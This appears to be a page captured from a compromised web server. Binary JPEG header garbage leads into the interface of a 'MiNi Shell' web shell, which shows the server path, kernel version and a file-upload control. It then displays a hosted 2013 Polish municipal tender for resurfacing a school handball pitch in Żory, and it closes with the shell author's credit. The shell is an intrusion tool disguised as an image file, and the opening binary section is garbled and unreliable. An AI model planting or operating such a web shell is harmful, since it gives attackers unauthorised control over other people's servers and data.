JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130805/155435-N-2013.html

<p class="kh_header"><b>Żory: Wykonanie nowej nawierzchni boiska do piłki ręcznej przy Szkole Podstawowej Nr 1 
w Żorach.</b><br>
<b>Numer ogłoszenia: 155435 - 2013; data zamieszczenia: 05.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 32 4348245, faks 32 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie nowej nawierzchni boiska do piłki ręcznej przy Szkole Podstawowej Nr 1 
w Żorach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie nowej nawierzchni boiska do piłki ręcznej przy Szkole Podstawowej Nr 1 w Żorach.

Szczegółowy opis przedmiotu zamówienia zawierają:
1) dokumentacja projektowa,
2) specyfikacje techniczne wykonania i odbioru robót,
3) przedmiar robót. 

Przedmiotem zamówienia jest: 

I. Wykonanie boiska do piłki ręcznej o wymiarach 44,00m x 24,00m (pole gry 40,00m x 20,00m) o powierzchni całkowitej 1056,00m2      
-podbudowa przepuszczalna
-nawierzchnia boiska do piłki ręcznej - poliuretanowa w technologii typu NATRYSK
-wokół boiska obrzeża betonowe 8x30cm na ławie betonowej z oporem oddzielające sąsiednie elementy terenu od płyty boiska
-za bramkami zamontowane w sposób trwały z podłożem piłkochwyty wysokości 6m z siatki polipropylenowej
-przy boisku na skarpie istniejące trybuny przewidziane do wyremontowania poprzez montaż nowych siedzisk z desek i wyrównanie podłoża żwirem.
 Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji projektowej.
Roboty należy wykonać zgodnie z dokumentacją projektową i SST.
WYMAGANE PARAMETRY NAWIERZCHNI.
Technologia typu NATRYSK - na podbudowie przepuszczalnej z kruszywa kamiennego instaluje się warstwę przepuszczalną dla wody i warstwę stabilizującą typu ET o grubości min. 30mm (w przypadku nieprzepuszczalnej podbudowy betonowej, asfaltowej lub asfaltowo-betonowej warstwa ET nie jest wymagana), następnie warstwę gr. 10-11 mm z granulatu SBR, następnie warstwę natrysku (mieszanka granulatu EPDM zmieszana z PU) o grubości 2-3mm.

Warstwy wymaganej nawierzchni sportowej:
1. WARSTWA DOLNA o grubości ok. 11 mm 
Bezspoinowa warstwa elastyczna, przepuszczalna dla wody, układana maszynowo 
za pomocą specjalistycznej maszyny tzw. układarki. 
Skład: mieszanina czarnego granulatu gumowego SBR fr. 1-4 mm połączonego
lepiszczem poliuretanowym.
2. WARSTWA GÓRNA o grubości ok. 2-3 mm 
Bezspoinowa warstwa elastyczna, przepuszczalna dla wody, układana maszynowo 
za pomocą specjalistycznej maszyny tzw. natryskarki pod wysokim ciśnieniem.
Skład: mieszanina systemu poliuretanowego i granulatu EPDM fr. 0,5-1,5 mm.

Na nawierzchnię nanoszone są linie specjalistyczną farbą poliuretanową w kolorze białym. Boisko do piłki ręcznej w kolorze ceglastym.

Nawierzchnia musi posiadać parametry techniczne nie gorsze niż:
-wytrzymałość na rozciąganie: >= 0,7 MPa
-wydłużenie względne przy rozciąganiu: 53 % ? 5
-wytrzymałość na rozdzieranie: >= 100 N
-ścieralność: <= 0,09 mm
-twardość w skali Shorea A: 65o ? 5
-zmiana wymiarów po działaniu temp. + 60oC <= 0,02 %
-odporność na działanie zmiennych cyklów hydrotermicznych: przyrost masy:    <= 0,70 %
-mrozoodporność: przyrost masy: <= 0,80 %
-przyczepność do podkładu betonowego: >= 0,60 MPa
-współczynnik tarcia kinetycznego:
*powierzchnia w stanie suchym: >= 0,35
*powierzchnia w stanie mokrym: >= 0,30 
-odporność na sztuczne starzenie (stopień w skali szarej): 5
-odporność na uderzenie: powierzchnia odcisku kulki: <= 500 mm2 +- 25

Podkład mineralno-syntetyczny.
Warstwa podkładowa o grubości ok. 35 mm stanowi bezpośrednie podłoże pod nawierzchnię poliuretanowo-gumową 
o grubości ok. 13 mm.
Warstwa podkładowa o grubości ok. 35 mm jest wykonywana maszynowo bezpośrednio na placu budowy, bezspoinowa, przepuszczalna dla wody.
Skład: mieszanina kruszywa kwarcowego i czarnego granulatu gumowego SBR połączonych lepiszczem poliuretanowym.

Charakterystyka podłoża
Przed wykonaniem płyty boiska dokonać niwelacji terenu. Podłoże, na którym ma być układana nawierzchnia poliuretanowa powinno być przygotowane zgodnie z instrukcją producenta, powinno być suche, równe, pozbawione zanieczyszczeń, mocne i stabilne. Wymagane  jest wykonanie kanalizacji drenarskiej przed wykonaniem nawierzchni boiska.

Dokumenty dotyczące oferowanej nawierzchni poliuretanowej:

1. Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008 , lub 
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB, lub 
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd
 lub dokument równoważny.
2. Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
3. Atest PZH lub dokument równoważny dla oferowanej nawierzchni.
4. Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem 60 miesięcznej gwarancji udzielonej przez producenta na tą nawierzchnię.

Wyżej wymienione wymagane dokumenty należy dołączyć do oferty.

II. Wyposażenie boisk w sprzęt sportowy

Wyposażenie boiska do piłki ręcznej
-bramki stalowe 3,0x2,0m montowane w tulejach	- 2 sztuki
-siatki do bramek - 2 sztuki

Wyposażenie boiska do piłki koszykowej
-obręcz do koszykówki standard i siatka do obręczy - 2 sztuki
-tablica do koszykówki epoksydowa o wym. 105 x 180cm - 2 sztuki
-mechanizm regulacji wysokości - 2 sztuki
-konstrukcja do koszykówki jednosłupowa, montowana w tulejach - 2 sztuki

Wyposażenie boiska do koszykówki i piłki ręcznej winno posiadać aktualne certyfikaty lub atesty bezpieczeństwa wydane przez jednostki certyfikujące, akredytowane przez Polskie Centrum Badań i Certyfikacji.
Aktualne certyfikaty lub atesty bezpieczeństwa należy dołączyć do oferty.

Informacje dodatkowe:
1. Po ułożeniu nowej nawierzchni poliuretanowej boiska do piłki ręcznej Zamawiający zastrzega sobie prawo zlecenia niezależnej instytucji wykonania badań laboratoryjnych nawierzchni oraz opracowanie ekspertyzy  poprawności wykonania nawierzchni poliuretanowej. 
2. Wykonawca odpowiada za ochronę środowiska na placu budowy i w jego otoczeniu, podejmuje odpowiednie środki w celu zabezpieczenia dróg prowadzących do placu budowy przed zniszczeniem i zanieczyszczeniem spowodowanym jego środkami transportowymi. Po zakończeniu robót przywraca je do stanu pierwotnego. 
3. Stosowane materiały powinny posiadać atesty oraz deklaracje zgodności - materiały potrzebne dla celów  realizacji przedmiotowego zamówienia są w gestii Wykonawcy.
4. Masy ziemne, gruz i odpady powstałe w trakcie robót przekazać odbiorcy odpadu posiadającemu zezwolenie na prowadzenie przetwarzania odpadów zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 roku (Dz. U. z 2013r. poz. 21) lub wykorzystać we własnym zakresie zgodnie z posiadanym zezwoleniem na prowadzenie przetwarzania odpadów. Przekazanie odpadów należy udokumentować pisemnie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.21.22.21-1, 45.11.12.00-0, 45.11.10.00-8, 45.23.61.10-4, 45.23.21.30-2, 45.23.24.10-9, 45.23.32.50-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota: 7.000,00 zł  (słownie: siedem tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykonał roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy  i doświadczenia w  okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj. co najmniej dwie roboty budowlane polegające na budowie lub przebudowie obiektów o docelowej nawierzchni  poliuretanowej o wartości nie mniejszej niż 100.000,00 zł brutto każda oraz  załączy dowody dotyczące najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wskaże osobę, która będzie uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialną za kierowanie robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub drogowej (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy) wraz z informacjami na temat jej kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie do dysponowania tą osobą. W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed wejściem w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy - w oparciu o art. 104 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2003 r. Nr 207, poz. 2016 ze zmianami).

Wykonawca oświadczy, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dla oferowanej nawierzchni poliuretanowej:
a)	Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008 , lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny,
b)	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta,
c)	Atest PZH lub dokument równoważny dla oferowanej nawierzchni,
d)	Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem 60 miesięcznej gwarancji udzielonej przez producenta na tą nawierzchnię.
Dla wyposażenia boiska
Certyfikaty lub atesty bezpieczeństwa wydane przez jednostki certyfikujące, akredytowane przez Polskie Centrum Badań i Certyfikacji dla wyposażenia boisk</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia lub inny dokument potwierdzający ten fakt - jeżeli Wykonawca polega na zasobach innych  podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
I. Przyczyna/okoliczności    
Konieczność zmiany dokumentacji projektowej wynikła w trakcie realizacji inwestycji.                                                          
Skutek - zmiana w umowie/aneks
Zmiana terminu realizacji zamówienia o  tyle dni, ile trwało przeprojektowanie, dostawa materiałów i realizacja wynikłe ze zmian projektowych 
II. Przyczyna/okoliczności    
Zmiana producenta materiałów /urządzeń, wycofania materiałów /urządzeń z użycia                                                         
Skutek - zmiana w umowie/aneks
Zmiana terminu wykonania zamówienia o czas potrzebny na zakup nowych materiałów/urządzeń
 III. Przyczyna/okoliczności    
Wystąpienie zdarzeń losowych - klęska żywiołowa
Skutek - zmiana w umowie/aneks
Zmiana terminu wykonania zadania o tyle dni, ile trwało wstrzymanie robót 
IV. Przyczyna/okoliczności    
Zmiana przepisów o podatku od towarów i usług.                                                          
Skutek - zmiana w umowie/aneks
zmniejszenie/zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT 
V. Przyczyna/okoliczności                                         
Przekształcenie firmy, zmiana nazwy firmy
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy.
VI. Przyczyna/okoliczności                                         
Rezygnacja z części robót na skutek sytuacji niemożliwej wcześniej do przewidzenia
Skutek - zmiana w umowie/aneks
Zmniejszenie wynagrodzenia wykonawcy o kwotę, którą należałoby zapłacić gdyby przedmiotowe roboty zostały wykonane.
VII. Przyczyna/okoliczności                                         
Zmiana podmiotu na zasobach którego opierał się wykonawca w celu spełnienia warunków udziału w postępowaniu.
Skutek - zmiana w umowie/aneks
Wprowadzenie zaakceptowanego przez Zamawiającego innego podmiotu który potwierdza spełnienie warunków w stopniu nie mniejszym niż wymagany w SIWZ
VIII. Przyczyna/okoliczności                                         
Długotrwałe, tj. powyżej 5 dni kalendarzowych, warunki atmosferyczne uniemożliwiające prowadzenie robót  zapisane w dzienniku budowy.
Skutek - zmiana w umowie/aneks
Przedłużenie terminu realizacji umowy o tyle dni, ile trwały warunki atmosferyczne uniemożliwiające prowadzenie robót.
IX. Przyczyna/okoliczności                                         
Potrzeba wprowadzenia lub zmiany zakresu robót wykonywanych przez podwykonawcę z przyczyn niezależnych od Wykonawcy
Skutek - zmiana w umowie/aneks
Spisania aneksu do umowy określającego zakres robót wykonywanych przez podwykonawcę.
X. Przyczyna/okoliczności                                         
Znalezienie niewybuchów
Skutek - zmiana w umowie/aneks
Przesunięcie terminu wykonania zadania o taki czas, ile trwało wstrzymanie robót związane z usunięciem niewybuchów
XI. Przyczyna/okoliczności                                         
Wstrzymanie prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę.
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile trwało wstrzymanie robót.
XII. Przyczyna/okoliczności                                         
Zlecenie wykonania badań laboratoryjnych nawierzchni i opracowanie ekspertyzy poprawności wykonania nawierzchni poliuretanowej.
Skutek - zmiana w umowie/aneks
Przesunięcie terminu wykonania zadania o tyle dni, ile trwało uzyskanie wyników badań i ekspertyzy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zory.pl  menu przedmiotowe: Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, pokój 203, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2013 godzina 11:00, miejsce: Urząd Miasta Żory, Al. Wojska Polskiego 25, 44-240 Żory, pok. INFORMACJA-parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com